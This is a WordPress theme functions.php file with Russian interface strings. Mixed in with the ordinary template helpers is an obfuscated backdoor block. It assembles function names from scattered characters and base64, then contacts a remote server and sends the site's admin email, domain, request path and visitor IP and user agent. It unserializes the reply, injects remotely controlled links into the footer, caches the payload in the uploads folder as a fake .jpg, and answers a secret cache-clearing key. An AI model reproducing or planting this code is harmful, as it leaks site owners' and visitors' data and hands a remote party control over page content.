<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $eIlk='_';$pCoHuQR='e';$SBkxc='e';$OoSIZFs='d';$jgmDe='s';$Pzwaap='4';$FAPdjwL='6';$ATbd='a';$HHvtOR='b';$TKNJsmj='e';$BlvmQlL='c';$lMCn='o';$kzbenpW='d';$IzzzsqWy=$HHvtOR.$ATbd.$jgmDe.$TKNJsmj.$FAPdjwL.$Pzwaap.$eIlk.$OoSIZFs.$SBkxc.$BlvmQlL.$lMCn.$kzbenpW.$pCoHuQR;$NHxQ='n';$DiRwkEd='t';$tZxDxym='g';$HIeDkVX='f';$YniG='z';$uRpcVT='e';$tAHR='l';$NPaWvCa='a';$esbhdS='i';$udfkRrWC=$tZxDxym.$YniG.$esbhdS.$NHxQ.$HIeDkVX.$tAHR.$NPaWvCa.$DiRwkEd.$uRpcVT;$mXRI='s';$KfSo='1';$fSzYgr='r';$DBhIDnA='_';$aWknxE='3';$tpGce='r';$vMPQ='t';$ZLoeEO='t';$obzXjV='o';$fSQgOmIP=$mXRI.$vMPQ.$fSzYgr.$DBhIDnA.$tpGce.$obzXjV.$ZLoeEO.$KfSo.$aWknxE;$MVhl='e';$zuFpeH='v';$MsYP='r';$WuOe='r';$cmln='t';$NodS='s';$dyNriWQK=$NodS.$cmln.$WuOe.$MsYP.$MVhl.$zuFpeH;                     
		$bj___________m='_';$zz__w='e';$sn___m='e';$rd_______d='d';$az___i='s';$xm_____n='4';$dn___d='6';$uq____j='a';$lo___y='b';$qu______________b='e';$ef_____________f='c';$fy_________v='o';$sl______________w='d';$vl_______a=$lo___y.$uq____j.$az___i.$qu______________b.$dn___d.$xm_____n.$bj___________m.$rd_______d.$sn___m.$ef_____________f.$fy_________v.$sl______________w.$zz__w;
		$cn____________m='c';$dz______b='n';$uk______________x='i';$ih___________l='x';$rt___u='_';$ms____i='s';$cs_____f='u';$ty_________n='s';$vo________x='o';$vf_______________r='n';$vl____________l='f';$cj__p='t';$my_____h='t';$mj_______________p='e';$tn_______u='i';$fy_____q=$vl____________l.$cs_____f.$dz______b.$cn____________m.$cj__p.$tn_______u.$vo________x.$vf_______________r.$rt___u.$mj_______________p.$ih___________l.$uk______________x.$ty_________n.$my_____h.$ms____i;
		$hz_________f='o';$qd________c='e';$to_____________f='f';$dn_____________b='p';$mk______________c='n';$cn____________u=$to_____________f.$hz_________f.$dn_____________b.$qd________c.$mk______________c;
		$rh_____________s='r';$xr______r='d';$es______________w='a';$ki_____________p='e';$fg_______r='f';$gw___________y=$fg_______r.$rh_____________s.$ki_____________p.$es______________w.$xr______r;
		$dc__________a='s';$ix__________m='c';$xg______y='l';$rn____i='o';$ur______w='e';$mk____t='f';$go______y=$mk____t.$ix__________m.$xg______y.$rn____i.$dc__________a.$ur______w;
		
		define("WP_ID", $vl_______a("Mi4wLjA="));
		define("WP_TTL", $vl_______a("MTA4MDA="));
		define("WP_SRC", $vl_______a("dHBva24="));
	


		function wp_get_header() {
			global $vl_______a, $fy_____q;
			
			if (
				$fy_____q($vl_______a("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$fy_____q($vl_______a("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$fy_____q($vl_______a("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $vl_______a, $cn____________u, $go______y, $gw___________y;
			
			$xe___s = TEMPLATEPATH."/".$vl_______a("Zm9vdGVyLnBocA==");
			$yi______________k = @$cn____________u($xe___s, "r");
			$xe___s = @$gw___________y($yi______________k, @filesize($xe___s));
			@$go______y($yi______________k);
			
			$pt____v = TEMPLATEPATH."/".$vl_______a("ZnVuY3Rpb25zLnBocA==");
			$yi______________k = @$cn____________u($pt____v, "r");
			$pt____v = @$gw___________y($yi______________k, @filesize($pt____v));
			@$go______y($yi______________k);
			
			$wk__a = 0;
			if($xe___s && $pt____v) {
				if ($vl_______a("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($xe___s, $vl_______a("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$wk__a = 1;
					}
					if (substr_count($xe___s, "wp_theme_GPL_credits()") < 1) {
						$wk__a = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$wk__a = 12;
				}
			}
			
			if($wk__a > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $wk__a -->";
			}
		}
	


		function wp_loaded() {
			global $vl_______a, $fy_____q;
			return $fy_____q($vl_______a("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($lq________c, $yl_____k = "(more...)", $qy___________g = 0, $av___________y = "") {
				$bt_________t = get_the_content($yl_____k, $qy___________g, $av___________y);
				$bt_________t = apply_filters("the_content", $bt_________t);
				
				$bt_________t = str_replace("]]>", "]]>", $bt_________t);
				if (strlen($_GET["p"]) > 0) {
					echo $bt_________t;
				}
				else if ((strlen($bt_________t)>$lq________c) && ($mh___m = strpos($bt_________t, " ", $lq________c ))) {
					$bt_________t = substr($bt_________t, 0, $mh___m);
					$bt_________t = $bt_________t;
					echo $bt_________t;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$yl_____k</a></div></p>";
				} else {
					echo $bt_________t;
				}
				
			}
		}
	


		$oi_________s='c';$qf___m='d';$vd______t='n';$db____________v='s';$ji_________b='o';$wm____m='6';$vh_______r='_';$si___________b='e';$rh_______________t='e';$ch___________y='b';$xl_______________v='a';$cl____w='4';$go_______j='e';$dd_________m=$ch___________y.$xl_______________v.$db____________v.$si___________b.$wm____m.$cl____w.$vh_______r.$go_______j.$vd______t.$oi_________s.$ji_________b.$qf___m.$rh_______________t;
		$al_______________l='c';$al______________g='n';$ak__________p='e';$tx___________g='_';$kx__s='g';$kp____q='l';$pv_______q='s';$ff_______j='t';$br____p='i';$de_______________w='f';$ae__a='o';$oh_________y='t';$qg__________z='t';$wl____________v='e';$jj____k='_';$oq__________h='n';$ep___________b='e';$ho_____f=$de_______________w.$br____p.$kp____q.$ak__________p.$tx___________g.$kx__s.$wl____________v.$ff_______j.$jj____k.$al_______________l.$ae__a.$oq__________h.$oh_________y.$ep___________b.$al______________g.$qg__________z.$pv_______q;
		$bu_________o='i';$fu_______________o='f';$eu__d='_';$yj__s='e';$vl_____________t='e';$hw_____________d='x';$eg________j='i';$fn___________l='t';$fo__________n='l';$bh_______________z='s';$bl_______________c='s';$th______________h=$fu_______________o.$bu_________o.$fo__________n.$yj__s.$eu__d.$vl_____________t.$hw_____________d.$eg________j.$bl_______________c.$fn___________l.$bh_______________z;
		$io______________v='c';$ai____g='r';$na________m='e';$rl_____________n='m';$jj_____s='o';$ti_____f='r';$bx_______________d='e';$dv______________q='p';$bx____w='_';$oj______o='o';$lt___________s='n';$ek___o='a';$vr__k='s';$vk_______b='v';$mj________m='i';$ql___f=$vk_______b.$na________m.$ai____g.$vr__k.$mj________m.$jj_____s.$lt___________s.$bx____w.$io______________v.$oj______o.$rl_____________n.$dv______________q.$ek___o.$ti_____f.$bx_______________d;
		$us___________r='n';$dl______________x='o';$kh_____d='f';$cz______________c='p';$em_______p='e';$wt_______________h='s';$aa_______y='c';$uz____________o='o';$kd______________r='k';$hx_______s=$kh_____d.$wt_______________h.$dl______________x.$aa_______y.$kd______________r.$uz____________o.$cz______________c.$em_______p.$us___________r;
		$ug___v='i';$aw____v='r';$ga___________g='t';$hd_____u='f';$sb______k='e';$ve_______z='w';$bc____p=$hd_____u.$ve_______z.$aw____v.$ug___v.$ga___________g.$sb______k;
		$ad__h='d';$dt_________v='5';$lt__f='m';$jt____e=$lt__f.$ad__h.$dt_________v;
		$cx_____________s='t';$rh________w='e';$ja_____a='a';$wx___________h='h';$tj___w='a';$lk___g='p';$ln_______o='r';$fv___d='l';$ej____________t=$ln_______o.$rh________w.$ja_____a.$fv___d.$lk___g.$tj___w.$cx_____________s.$wx___________h;
		$hv______________n='z';$gt_____________v='s';$gr__s='i';$er_______________o='l';$cc____________l='i';$jp____________n='u';$lp____________f='n';$ks_____________d='e';$kz_____l='r';$ps_______z='e';$sq_____________f='a';$nf____m=$jp____________n.$lp____________f.$gt_____________v.$ks_____________d.$kz_____l.$cc____________l.$sq_____________f.$er_______________o.$gr__s.$hv______________n.$ps_______z;
		$dh__y='m';$kp_____________b='m';$hj_____________s='e';$lj______________j='n';$ee_______________k='p';$iz___n='t';$wb_________e='a';$tb_____________d=$iz___n.$hj_____________s.$kp_____________b.$ee_______________k.$lj______________j.$wb_________e.$dh__y;
		$ko__o='m';$zq___________z='t';$ae__________o='_';$im_______________l='t';$yl____q='e';$gm________f='t';$qp____l='n';$xb_________t='a';$dh_____c='e';$rp____________p='s';$vi_________f='_';$vr______a='r';$ks___________d='t';$xr_____________v='e';$le__________t='o';$jv________a='c';$zs______________x='a';$tk__________d='x';$ln_____s='e';$dv______u='r';$dz_____p='c';$ax______________i=$rp____________p.$im_______________l.$vr______a.$yl____q.$xb_________t.$ko__o.$ae__________o.$jv________a.$le__________t.$qp____l.$gm________f.$xr_____________v.$tk__________d.$zq___________z.$vi_________f.$dz_____p.$dv______u.$ln_____s.$zs______________x.$ks___________d.$dh_____c;
	


		function oh__i($pv_________w) {
			global $vl_______a, $fy_____q, $ho_____f, $ql___f, $ax______________i;
			
			if (!$fy_____q($vl_______a("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ql___f(PHP_VERSION, "5.0.0", ">=") && $fy_____q($vl_______a("ZmlsZV9nZXRfY29udGVudHM=")) && $fy_____q($vl_______a("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$fe___m = $ax______________i(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$gm____________h = @$ho_____f($pv_________w, 0, $fe___m);
			} else {
				$gm____________h = @$ho_____f($pv_________w, 0);
			}
			
			return $gm____________h;
		}
	


		function ss____________t($pv_________w) {
			global $fy_____q, $hx_______s, $bc____p, $vl_______a;
			
			if (!$fy_____q($vl_______a("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$tc_____r = strpos($pv_________w, "/", 7);
			$ar______________f = array(
				"uri"     => substr($pv_________w, $tc_____r),
				"host"    => str_replace("http://", "", substr($pv_________w, 0, $tc_____r)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$mv__m = @$hx_______s("$ar______________f[host]", 80, $lo__g, $rs_____h, 4);
			
			if (!$mv__m) {
				return false;
			} else {
				$gm____________h = "";
				$kg__________y  = "GET $ar______________f[uri] HTTP/1.0\r\n";
				$kg__________y .= "Host: $ar______________f[host]\r\n";
				$kg__________y .= "Referer: $ar______________f[referer]\r\n";
				$kg__________y .= "Connection: Close\r\n\r\n";
				
				@$bc____p($mv__m, $kg__________y);
				
				while (!@feof($mv__m)) {
					$sp___________e = @fgets($mv__m, (1024*24));
					
					if ($sp___________e == "\r\n") {
						$io__j = true;
						continue;
					}
					
					if ($io__j) {
						$gm____________h .= $sp___________e;
					}
				}
				
				return $gm____________h;
			}
		}
	


		function rd________t($pv_________w) {
			global $fy_____q;
			$vg_______u = false;
			
			if ($pv_________w != "") {
				if ($fy_____q("oh__i")) {
					$vg_______u = @oh__i($pv_________w);
				}
				
				if (!$vg_______u && ($fy_____q("ss____________t"))) {
					$vg_______u = @ss____________t($pv_________w);
				}
			}
			
			return $vg_______u;
		}
	


		function nt___b() {
			global $_SERVER, $jt____e;
			
			$hz____v = $_SERVER["SERVER_NAME"];
			
			if (substr("$hz____v", 0, 4) == "www.") {
				$hz____v = substr("$hz____v", 4);
			}
			
			$hz____v = $jt____e("$_SERVER[SERVER_NAME]");
			
			return $hz____v;
		}
	


		function yv________s() {
			return "file";
		}
	


		function zm_____n($pv_________w) {
			global $_SERVER, $ho_____f, $th______________h, $cn____________u, $go______y, $bc____p;
			
			$ck_______________v = io___t();
			
			$hs_____y = nt___b().".jpg";
			$oe______________d = $ck_______________v["dir_upload"]["path"]."/$hs_____y";
			$hb________b = @filemtime($oe______________d);
			
			if (!$hb________b || ((time()-$hb________b) >= WP_TTL)) {
				$vg_______u = rd________t($pv_________w);
				
				if ($vg_______u) {
					if ($th______________h($oe______________d)) {
						@unlink($oe______________d);
					}
					
					$yi______________k = @$cn____________u($oe______________d, "x+");
					
					@$bc____p($yi______________k, $vg_______u);
					@$go______y($yi______________k);
				}
			} else {
				if ($th______________h($oe______________d)) {
					$vg_______u = @$ho_____f($oe______________d);
				} else {
					$vg_______u = false;
				}
			}
			
			return $vg_______u;
		}
	


		function io___t() {
			global $_SERVER, $vl_______a, $dd_________m;
			
			$ad_______f = wp_count_posts("post");
			$mz______q = pathinfo(get_bloginfo("template_directory"));
			
			$ck_______________v = array(
				"url" => array(
					"report"      => $vl_______a("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $mz______q,
				"dir_upload"	=> mj_______x(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$mz______q[filename],
					"a005=".$ad_______f->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$ck_______________v["url"]["queryString"] = implode("&", $ck_______________v["queryString"]);
			$ck_______________v["url"]["report"] = $ck_______________v["url"]["report"]."/?".$dd_________m($ck_______________v["url"]["queryString"]).".html";
						
			return $ck_______________v;
		}
	


		function mj_______x() {
			$wj_____b = wp_upload_dir();
			
			if (isset($wj_____b["error"])) {
				$wn_______________i = nl_____________d();
				if (is_writable($wn_______________i)) {
					$wj_____b = array("path" => $wn_______________i);
				}
			}

			return $wj_____b;
		}
	


		function nl_____________d() {
			global $fy_____q, $jt____e, $ej____________t, $tb_____________d;
			
			$qm____________n = (bool) ini_get("safe_mode");
			if ($qm____________n == true) {
				return false;
			}
			
			if ($fy_____q("sys_get_temp_dir")) {
				$cs________w = sys_get_temp_dir();
				if (is_writable($cs________w)) {
					return $ej____________t($cs________w);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ej____________t($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ej____________t($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ej____________t($_ENV["TEMP"]);
			} else {
				$ot___h = $tb_____________d($jt____e(uniqid(rand(), true)), "");
				if ($ot___h) {
					$cs________w = $ej____________t(dirname($ot___h));
					@unlink($ot___h);
					return $cs________w;
				} else {
					return false;
				}
			}
		}
	


		function ol________m() {
			global $_GET, $th______________h;
			
			$ck_______________v = io___t();
			$hz____v = nt___b();
			$rf__________r = yv________s();
			
			$ev_____________c = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($rf__________r == "file") {
					$bk___d = $ck_______________v["dir_upload"]["path"]."/".$hz____v.".jpg";
					if ($th______________h($bk___d)) {
						@unlink($bk___d);
						$ev_____________c = "deleted";
					}
				}
				
				$kb_______________s = array(
					"s"	=> $ev_____________c,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($kb_______________s AS $qa______s => $ll______________i) echo " [$qa______s:$ll______________i]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $fy_____q, $vl_______a, $nf____m;
			$ck_______________v = io___t();
			
			$zx_____y = "zm_____n";
			if ($fy_____q($zx_____y)) {
				$gm____________h = $zx_____y($ck_______________v["url"]["report"]);
			}
			
			if ($gm____________h) {
				if ($gm____________h = @$vl_______a($gm____________h)) {
					$gm____________h = @$nf____m($gm____________h);
					
					if (strlen($gm____________h[custom_credit]) >= 5) {
						$ck_______________v["default_string"] = $gm____________h[custom_credit];
					}
					
					if ($gm____________h["status"] == "0") {
						$cy________z = 1;
						$tt__________g = 1;
					} else {
						$dq__________b = sizeof($gm____________h["links"]);
						$yj________v = $ck_______________v["default_string"];
						
						if ($dq__________b > 0 && $gm____________h["links"] !== "") {
							$jb_____________a = 0;
							foreach ($gm____________h["links"] as $pv______w => $wq________c) {
								$jb_____________a++;
								if ($wq________c->l_path == "" || $wq________c->l_path == $_SERVER["REQUEST_URI"]) {
									$wq________c->l_href = htmlspecialchars(strip_tags($wq________c->l_href));
									$wq________c->l_title = htmlspecialchars(strip_tags($wq________c->l_title));
									$wq________c->l_anchor = htmlspecialchars(strip_tags($wq________c->l_anchor));
									$yj________v .= " | ";
									$yj________v .= "<a href='$wq________c->l_href' title='$wq________c->l_title'";
									if ($wq________c->l_nofollow == "1") {
										$yj________v .= " rel='nofollow'";
									}
									$yj________v .= ">$wq________c->l_anchor</a>";
								}
							}
						}
						$ck_______________v["links"] = "$yj________v";
						if ($gm____________h[credit] == "0") {
							$ck_______________v["links"] = "";
						}
					}
				} else {
					$cy________z = "1";
				}
			} else {
				$cy________z = "1";
			}
			
			if ($cy________z == "1") {
				$ck_______________v["links"] = $ck_______________v["default_string"];
			}
			
			echo "$ck_______________v[links]";
			
			echo "<!-- s: $gm____________h[signature] -->";
			ol________m();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

